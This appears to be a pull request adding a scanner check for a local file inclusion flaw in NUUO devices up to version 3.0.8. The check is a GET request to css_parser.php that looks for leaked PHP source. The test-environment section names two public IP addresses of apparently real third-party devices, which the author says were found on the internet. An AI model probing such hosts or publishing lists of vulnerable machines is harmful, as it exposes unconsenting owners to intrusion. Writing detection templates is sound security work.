### PR TITLE
NUUO<=3.0.8本地文件包含漏洞

### DIFF
--- a/pocs/poc-NUUO-FileInclusion.yaml
+++ b/pocs/poc-NUUO-FileInclusion.yaml
@@ -2,9 +2,5 @@ name: poc-NUUO-FileInclusion
 rules:
   - method: GET
     path: /css_parser.php?css=css_parser.php
-    headers:
-      User-Agent: >-
-        Mozilla/5.0 (X11; CrOS armv7l 9592.96.0) AppleWebKit/537.36 (KHTML, like
-        Gecko) Chrome/60.0.3112.114 Safari/537.36
     follow_redirects: false
     expression: status == 200 && headers['content-type'] == 'text/css' && body.bcontains(b"$_GET['css']")

--- a/pocs/poc-NUUO-FileInclusion.yaml
+++ b/pocs/poc-NUUO-FileInclusion.yaml
@@ -1,0 +1,11 @@
+name: poc-NUUO-FileInclusion
+rules:
+  - method: GET
+    path: /css_parser.php?css=css_parser.php
+    headers:
+      User-Agent: >-
+        Mozilla/5.0 (X11; CrOS armv7l 9592.96.0) AppleWebKit/537.36 (KHTML, like
+        Gecko) Chrome/60.0.3112.114 Safari/537.36
+    follow_redirects: false
+    expression: status == 200 && headers['content-type'] == 'text/css'
+    search: <?php

--- a/pocs/poc-NUUO-FileInclusion.yaml
+++ b/pocs/poc-NUUO-FileInclusion.yaml
@@ -7,5 +7,4 @@ rules:
         Mozilla/5.0 (X11; CrOS armv7l 9592.96.0) AppleWebKit/537.36 (KHTML, like
         Gecko) Chrome/60.0.3112.114 Safari/537.36
     follow_redirects: false
-    expression: status == 200 && headers['content-type'] == 'text/css'
-    search: <?php
+    expression: status == 200 && headers['content-type'] == 'text/css' && body.bcontains(b"$_GET['css']")


### PR DESCRIPTION
## Summary

what POC is this PR for?

NUUO<=3.0.8本地文件包含漏洞

## POC

```yaml
name: poc-NUUO-FileInclusion
rules:
  - method: GET
    path: /css_parser.php?css=css_parser.php
    headers:
      User-Agent: >-
        Mozilla/5.0 (X11; CrOS armv7l 9592.96.0) AppleWebKit/537.36 (KHTML, like
        Gecko) Chrome/60.0.3112.114 Safari/537.36
    follow_redirects: false
    expression: status == 200 && headers['content-type'] == 'text/css'
    search: <?php
```

## Test Environment

http://96.81.75.189/
http://81.244.17.103:2080/

Dockerfile: 

```dockerfile
none
```

## Remarks

没有dock，在公网找了几个示例
